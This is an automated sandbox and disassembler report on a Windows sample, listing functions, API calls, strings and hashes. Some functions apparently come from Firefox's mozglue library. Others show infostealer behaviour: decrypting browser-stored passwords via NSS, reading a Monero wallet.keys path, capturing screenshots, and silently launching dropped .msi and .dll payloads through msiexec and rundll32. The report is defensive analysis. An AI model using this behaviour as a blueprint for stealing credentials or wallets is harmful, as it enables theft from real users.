Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 4b15bbe344653ab6d8947ca24f70996f6cf10a239826f25ed4d1dda7afcc304f
Instruction ID: 7733f88685e8348c1e0988f3c290962d643330c356fae77a760a911715e74490
Opcode Fuzzy Hash: 4b15bbe344653ab6d8947ca24f70996f6cf10a239826f25ed4d1dda7afcc304f
Instruction Fuzzy Hash: F451C5D0B192B532FE003D156D10BEA5649EF1324AF21403EFD1AA1EC0FF16B65A86B7

Function 6CBA4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBA4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CBA44B2,6CC1E21C,6CC1F7F8), ref: 6CBA473E
Part of subcall function 6CBA4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CBA474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CBA44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CBA44D2
InitOnceExecuteOnce.KERNEL32(6CC1F80C,6CB9F240,?,?), ref: 6CBA451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CBA455C
LoadLibraryW.KERNEL32(?), ref: 6CBA4592
InitializeCriticalSection.KERNEL32(6CC1F770), ref: 6CBA45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6CBA45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6CBA45BB
InitOnceExecuteOnce.KERNEL32(6CC1F818,6CB9F240,?,?), ref: 6CBA4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CBA4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6CBA4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6CBA466D
VerSetConditionMask.NTDLL ref: 6CBA469F
VerSetConditionMask.NTDLL ref: 6CBA46AB
VerSetConditionMask.NTDLL ref: 6CBA46B2
VerSetConditionMask.NTDLL ref: 6CBA46B9
VerSetConditionMask.NTDLL ref: 6CBA46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CBA46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6CBA46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CBA46FD

Strings

l, xrefs: 6CBA4578
user32.dll, xrefs: 6CBA4557, 6CBA463F
kernel32.dll, xrefs: 6CBA44CD
NativeNtBlockSet_Write, xrefs: 6CBA46F7
WRusr.dll, xrefs: 6CBA44B5

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: 04e36b01ad630b237302bb3be31b588e33c442cb94094a4e2508745c2265e6a5
Instruction ID: c7f723e4bbd6122374e0c3f8114a6b71ebc8563b808d9f07ce64ef871c7c5f14
Opcode Fuzzy Hash: 04e36b01ad630b237302bb3be31b588e33c442cb94094a4e2508745c2265e6a5
Instruction Fuzzy Hash: 1661E8B06083849FEB10DFA6CC0AB957BB8FF47308F048599E5449BE51EBB18946CF91

Function 0076C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0076C9A5

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0125D538,00000000,?,0078144C,00000000,?,?), ref: 0076CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0076CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0076CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0076CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0076CAD9
StrStrA.SHLWAPI(?,0125D448,00780B52), ref: 0076CAF7
StrStrA.SHLWAPI(00000000,0125D460), ref: 0076CB1E
StrStrA.SHLWAPI(?,0125D750,00000000,?,00781458,00000000,?,00000000,00000000,?,01259208,00000000,?,00781454,00000000,?), ref: 0076CCA2
StrStrA.SHLWAPI(00000000,0125D730), ref: 0076CCB9

Part of subcall function 0076C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0076C871
Part of subcall function 0076C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0076C87C
Part of subcall function 0076C820: PK11_GetInternalKeySlot.NSS3 ref: 0076C88A
Part of subcall function 0076C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0076C8A5
Part of subcall function 0076C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0076C8EB
Part of subcall function 0076C820: PK11_FreeSlot.NSS3(?), ref: 0076C961

StrStrA.SHLWAPI(?,0125D730,00000000,?,0078145C,00000000,?,00000000,012590E8), ref: 0076CD5A
StrStrA.SHLWAPI(00000000,01258E78), ref: 0076CD71

Part of subcall function 0076C820: lstrcat.KERNEL32(?,00780B46), ref: 0076C943
Part of subcall function 0076C820: lstrcat.KERNEL32(?,00780B47), ref: 0076C957
Part of subcall function 0076C820: lstrcat.KERNEL32(?,00780B4E), ref: 0076C978

lstrlen.KERNEL32(00000000), ref: 0076CE44
CloseHandle.KERNEL32(00000000), ref: 0076CE9C
NSS_Shutdown.NSS3 ref: 0076CEAA

Strings

, xrefs: 0076C9C6

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: b6a73f7717b3c779b37c17a32964f220e9b74d1ba0502a6ff938385a164d12df
Instruction ID: 99a451b1260ba3b878c18b3fd6d4d0d7ec233df06a6048e1336a3541301d834e
Opcode Fuzzy Hash: b6a73f7717b3c779b37c17a32964f220e9b74d1ba0502a6ff938385a164d12df
Instruction Fuzzy Hash: 49E10171810108FBDF15EBA0DC99FEEB778AF54340F408169F51A66191DF386A4ACFA2

Function 6CBA9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB931C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CB93217
Part of subcall function 6CB931C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CB93236
Part of subcall function 6CB931C0: FreeLibrary.KERNEL32 ref: 6CB9324B
Part of subcall function 6CB931C0: __Init_thread_footer.LIBCMT ref: 6CB93260
Part of subcall function 6CB931C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CB9327F
Part of subcall function 6CB931C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CB9328E
Part of subcall function 6CB931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CB932AB
Part of subcall function 6CB931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CB932D1
Part of subcall function 6CB931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CB932E5
Part of subcall function 6CB931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CB932F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CBA9675
__Init_thread_footer.LIBCMT ref: 6CBA9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CBA96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CBA9707
__Init_thread_footer.LIBCMT ref: 6CBA971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CBA9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CBA97B7
FreeLibrary.KERNEL32 ref: 6CBA97D0
FreeLibrary.KERNEL32 ref: 6CBA97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CBA9824

Strings

ntdll.dll, xrefs: 6CBA96E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6CBA9670
NtMapViewOfSection, xrefs: 6CBA9701
MapViewOfFileNuma2, xrefs: 6CBA97B1

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 012ee65afc62e9ee11899019fd403f7789682cf17bc5759845206cd62a6e8ce6
Instruction ID: 2c22b9ff56ee01355919b3568869aa7bb2dc24215298c027c7e46bafa363d1b7
Opcode Fuzzy Hash: 012ee65afc62e9ee11899019fd403f7789682cf17bc5759845206cd62a6e8ce6
Instruction Fuzzy Hash: 2E61CFB1B082819FDF00CFAAD886A9A7BB1FF4B314F104129E95583F90D731D855DBA2

Function 00779010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0077906C

Strings

image/jpeg, xrefs: 00779136

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: a1feaad441620ae001b8c239e9ae289f7b957e902e96bf8a9c13305dc5c25b0c
Instruction ID: 60d84554e5135bb6e9cd2aa998305978221e2118e72d2c44155e6f80dcd9f22b
Opcode Fuzzy Hash: a1feaad441620ae001b8c239e9ae289f7b957e902e96bf8a9c13305dc5c25b0c
Instruction Fuzzy Hash: D971D071910208EBDB04EFE4DC59FEEB7B8BF48700F548508F616A7290DB389905DB61

Function 6CBED4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBED4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBED4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBED52A
GetCurrentThreadId.KERNEL32 ref: 6CBED530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBED53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBED55F
free.MOZGLUE(00000000), ref: 6CBED585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CBED5D3
GetCurrentThreadId.KERNEL32 ref: 6CBED5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBED605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBED652
GetCurrentThreadId.KERNEL32 ref: 6CBED658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBED667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBED6A2

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 0f37a91dfdb53b8e8a7d5922085e5838b79c3d6cdc93c6a8aabb05c9a4f1d044
Instruction ID: 4eacfdca1a994d248e7908405a5423f1776be60b3694bfb5c6796247259a2142
Opcode Fuzzy Hash: 0f37a91dfdb53b8e8a7d5922085e5838b79c3d6cdc93c6a8aabb05c9a4f1d044
Instruction Fuzzy Hash: 87516CB1604745DFC704DF35C898A9ABBF4FF89358F00862EE85A87B11DB70A945CB92

Function 007717A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 007717C5
ExitProcess.KERNEL32 ref: 007717D1

Strings

block, xrefs: 007717B7

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 7c27fd8fe7bd9d612b3258fec4ff16bbb6b0123bb7eec4906f83cf9fa3abda85
Instruction ID: 1e20761ea2db8fa6f0bf2263dba113e5dc9e67e5c249c339189307adf5ef714d
Opcode Fuzzy Hash: 7c27fd8fe7bd9d612b3258fec4ff16bbb6b0123bb7eec4906f83cf9fa3abda85
Instruction Fuzzy Hash: BA519EB4A08209EBDF04DFA8C854ABE37B9BF44344F10C048E50967240D738E946DFA2

Function 00772E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

ShellExecuteEx.SHELL32(0000003C), ref: 007731C5
ShellExecuteEx.SHELL32(0000003C), ref: 0077335D
ShellExecuteEx.SHELL32(0000003C), ref: 007734EA

Strings

C:\Windows\system32\msiexec.exe, xrefs: 007734BF
.msi, xrefs: 00773398
C:\Windows\system32\rundll32.exe, xrefs: 00773332
<, xrefs: 00773490
/passive, xrefs: 0077345B
/i ", xrefs: 007733E4
.dll, xrefs: 007731E5
"" , xrefs: 0077309A

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 7eaa822d5209e9a09c0ea990ba949e5899ab13ffedf0bc5d87de402f7c16f1e2
Instruction ID: b370c37a5db91c94a57a38a143fa1f3d2534dbf8f415e8d2ef37f370102b0e5a
Opcode Fuzzy Hash: 7eaa822d5209e9a09c0ea990ba949e5899ab13ffedf0bc5d87de402f7c16f1e2
Instruction Fuzzy Hash: 1812F371810108EAEF15FBA0DC5AFDE7778AF54340F508169F51A66191EF382B4ACF92

Function 6CBDEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBA4A68), ref: 6CBD945E
Part of subcall function 6CBD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBD9470
Part of subcall function 6CBD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBD9482
Part of subcall function 6CBD9420: __Init_thread_footer.LIBCMT ref: 6CBD949F

GetCurrentThreadId.KERNEL32 ref: 6CBDEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBDEC8C

Part of subcall function 6CBD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CBD94EE
Part of subcall function 6CBD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CBD9508

GetCurrentThreadId.KERNEL32 ref: 6CBDECA1
AcquireSRWLockExclusive.KERNEL32(6CC1F4B8), ref: 6CBDECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CBDECC5
ReleaseSRWLockExclusive.KERNEL32(6CC1F4B8), ref: 6CBDED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CBDED19
